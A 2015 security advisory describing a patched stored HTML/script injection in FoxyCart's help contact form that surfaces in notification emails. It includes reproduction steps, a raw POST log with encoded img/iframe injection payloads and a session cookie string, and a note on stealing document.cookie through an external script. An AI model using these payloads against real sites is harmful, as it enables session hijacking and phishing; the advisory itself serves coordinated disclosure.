Document Title:
===============
FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1451

098bdc9b309783df65044c5abb690dafdd4bcd436c380ae68c924fe37e14b4e0


Release Date:
=============
2015-07-15


Vulnerability Laboratory ID (VL-ID):
====================================
1451


Common Vulnerability Scoring System:
====================================
3.4


Product & Service Introduction:
===============================
Helping developers _add_ custom ecommerce without reinventing the wheel.

(Copy of the Homepage:  https://github.com/FoxyCart )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side input validation vulnerability in the official FoxyCart web-application.


Vulnerability Disclosure Timeline:
==================================
2015-03-05: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-04-01: Vendor Notification (FoxyCart - Security Research Team)
2015-04-09: Vendor Response/Feedback (FoxyCart - Security Research Team)
2015-06-30: Vendor Fix/Patch ( (FoxyCart - Developer Team)
2015-07-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
FoxyCart LLC
Product: FoxyCart - Web Application 2015 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation mail encoding vulnerability has been discovered in the official FoxyCart company web-application.
The issue allows remote attackers to inject own malicious web context to the application-side of a vulnerable module or function.

The security vulnerability is located in the `comments` input field value of the `landing/white-glove-onboarding > Help Form` module. 
Remote attackers can exploit the issue to execute persistent malicious context in foxycart service mails.

The injection takes place in the help contact form POST method request with the vulnerable comments input value. The execution of the 
script code occurs on the application-side in the email body context. Attackers are able to inject iframes, img sources with onload alert 
or other script code tags. The service does not encode the input and has also no input restriction. 

After the code has been saved during the registration the internal service takes the wrong encoded dbms entries and stream them back in a 
notification mail to the registered users inbox. The attacker is also able to include random email adresses to stream mails with malicious 
persistent context to random targets for phishing, spam and co. The code does not execute in the profile values that introduces to the 
manufacturer itself but in the attached comments value that becomes visible in the copy mail.

The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss 
(common vulnerability scoring system) count of 3.4. If the issue is existing in the main service values the other services can be affected by the 
issue too. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and no privileged 
customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results in session hijacking, persistent 
phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected module context.

Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] landing/white-glove-onboarding > Help Form

Vulnerable Parameter(s):
				[+] comments

Affected Module(s):
				[+] We`ve received your email


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce ...
1. Open the foxcart service
2. Surf to the vulnerable conatct form url
3. Inject random value to the inputs and inject to the comments your script code payload
4. Save the entry
5. Redirect via Refresh Referer to confirm the contact request
6. Check inbox of the contact mail input
7. The code executes in the comments body section
8. Successful reproduce of the vulnerability! 



--- PoC Session Logs [POST] (Inject) ---
13:33:03.031[1210ms][total 1210ms] Status: 302[Found]
POST http://www.foxycart.com/landing/white-glove-onboarding Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[0] Mime Type[text/html]
   Request Header:
      Host[www.foxycart.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.foxycart.com/landing/white-glove-onboarding]
      Cookie[optimizelySegments=%7B%22234696064%22%3A%22ff%22%2C%22234587425%22%3A%22false%22%2C%22234346863%22%3A%22referral%22%7D; optimizelyEndUserId=oeu1425557285423r0.7588310203460514; optimizelyBuckets=%7B%22630610022%22%3A%22637250003%22%7D; __utma=91412365.670830544.1425557288.1425557288.1425557288.1; __utmb=91412365.49.9.1425557973207; __utmc=91412365; __utmz=91412365.1425557288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wcsid=bVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; hblid=cXd4qSmViFwp1L9N575fV3P3JONRArB8; _oklv=1425558756967%2CbVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; ajs_user_id=%22bkm%40evolution-sec.com%22; ajs_group_id=null; ajs_anonymous_id=%22f9f4d6e9-ba8f-4231-b4e5-fb1e4dd21d01%22; __ar_v4=M2MP7NP4NRDZJKE5JJ255A%3A20150304%3A14%7CMZASOLFIIFHM7D4UXSZSHG%3A20150304%3A14%7CZ5SPRZQMMBAYPLL3Z7BEBR%3A20150304%3A14; kvcd=1425558696901; km_ai=bkm%40evolution-sec.com; km_uq=; km_vs=1; km_lv=1425558697; olfsk=olfsk9501150073115311; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1425557290132%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=2799-934-10-5695; __utmv=91412365.|1=user_type=programmer%20developer%20merchant=1^2=trial=0.1=1; km_ni=bkm%40evolution-sec.com; optimizelyPendingLogEvents=%5B%5D]
      Connection[keep-alive]
   POST-Daten:
      firstName[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      lastName[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      email[bkm%40evolution-sec.com]
      phone[235235235]
      field-0[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      field-3[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      field-4[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      id[840b20b9386a4e669f20873f092ae257]
   Response Header:
      Content-Type[text/html]
      Expires[Thu, 05 Mar 15 04:34:12 -0800]
      Cache-Control[max-age=60]
      Vary[Accept-Encoding]
      Location[http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted]
      Content-Length[0]
      Accept-Ranges[bytes]
      Date[Thu, 05 Mar 2015 12:33:13 GMT]
      Connection[keep-alive]
      X-Frame-Options[SAMEORIGIN]


-
-
13:33:04.242[1255ms][total 1728ms] Status: 200[OK]
GET http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[7726] Mime Type[text/html]
   Request Header:
      Host[www.foxycart.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.foxycart.com/landing/white-glove-onboarding]
      Cookie[optimizelySegments=%7B%22234696064%22%3A%22ff%22%2C%22234587425%22%3A%22false%22%2C%22234346863%22%3A%22referral%22%7D; optimizelyEndUserId=oeu1425557285423r0.7588310203460514; optimizelyBuckets=%7B%22630610022%22%3A%22637250003%22%7D; __utma=91412365.670830544.1425557288.1425557288.1425557288.1; __utmb=91412365.49.9.1425557973207; __utmc=91412365; __utmz=91412365.1425557288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wcsid=bVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; hblid=cXd4qSmViFwp1L9N575fV3P3JONRArB8; _oklv=1425558756967%2CbVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; ajs_user_id=%22bkm%40evolution-sec.com%22; ajs_group_id=null; ajs_anonymous_id=%22f9f4d6e9-ba8f-4231-b4e5-fb1e4dd21d01%22; __ar_v4=M2MP7NP4NRDZJKE5JJ255A%3A20150304%3A14%7CMZASOLFIIFHM7D4UXSZSHG%3A20150304%3A14%7CZ5SPRZQMMBAYPLL3Z7BEBR%3A20150304%3A14; kvcd=1425558696901; km_ai=bkm%40evolution-sec.com; km_uq=; km_vs=1; km_lv=1425558697; olfsk=olfsk9501150073115311; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1425557290132%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=2799-934-10-5695; __utmv=91412365.|1=user_type=programmer%20developer%20merchant=1^2=trial=0.1=1; km_ni=bkm%40evolution-sec.com; optimizelyPendingLogEvents=%5B%5D]
      Connection[keep-alive]
   Response Header:
      Content-Type[text/html]
      Expires[Thu, 05 Mar 15 04:34:13 -0800]
      Cache-Control[max-age=60]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[7726]
      Accept-Ranges[bytes]
      Date[Thu, 05 Mar 2015 12:33:14 GMT]
      Connection[keep-alive]
      X-Frame-Options[SAMEORIGIN]



Note: Inject an img or iframe with an external js source that requests session data by usage of document.cookie to exploit

Reference(s):
http://www.foxycart.com/landing/white-glove-onboarding
http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure filter mechanism next to the help comment support form.
Restrict the input and encode the output message with the delivered copy.


Security Risk:
==============
The security risk of the filter issue and application-side input validation vulnerability is estimated as medium. (CVSS 3.4)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt